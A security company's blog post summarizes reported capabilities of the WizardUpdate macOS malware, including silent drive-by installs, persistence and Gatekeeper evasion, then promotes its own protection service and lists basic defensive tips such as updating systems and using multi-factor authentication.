Introduction
On October 22nd of this year, Sergiu Gatlan on BleepingComputer.com posted a story concerning new WizardUpdate malware capabilities and tactics for evading detection.
What Happened?
WizardUpdate has been around since at least November of 2020 and has been evolving to include secondary payload downloads from cloud sources and Gatekeeper bypasses.
WizardUpdate, also known as UpdateAgent and Vigram, is malware attackers use to access Macs via ‘drive-by downloads.’ These are unintentional downloads initiated when visiting infected sites and are a “silent install.” In other words, the user will not see a notification or indication of the installation. Once the installation is complete, the malware begins to collect and exfiltrate data about its running system. It also creates folders and attempts permission elevation for the account under which it resides.
As the software progresses, it may download further malware, such as ‘Adload,’ which redirects search engine traffic to create a monetary return and continues to modify system settings to allow greater access. When the malware has successfully installed, it maintains persistence and residence by removing the install file’s quarantine attribute, running persistence scheduled jobs to ensure the software stays resident, and removing files and folders once they are no longer in use.
However, one of the biggest threats is that attackers can use this malware to infiltrate much more dangerous malware with little to no problems. Without immediate detection and quarantine/removal, this application could cause massive damage and financial stress for users and organizations.
It is also important to note that many of the samples found so far are signed using valid Developer IDs issued by Apple or default Gatekeeper settings. Unfortunately, at this time, there is no mention of how the malware developers obtained the IDs.
Northstarr Recommendations
While Apple operating systems have historically been much more secure than many others, there are still vulnerabilities. Northstarr doesn’t wait until the last minute to protect your devices and systems; we validate and install updates as they are made available. Our ACES platform also puts a great deal more protection for your network and systems between the outside world and you. See our website for more information at ACES . Until you do reach out to us, try these recommendations:
— Update your Mac systems to the latest version
— Ensure you are using the most up-to-date antivirus and anti-malware software
— Use multi-factor authentication
— Monitor your systems and networks for unusual activity.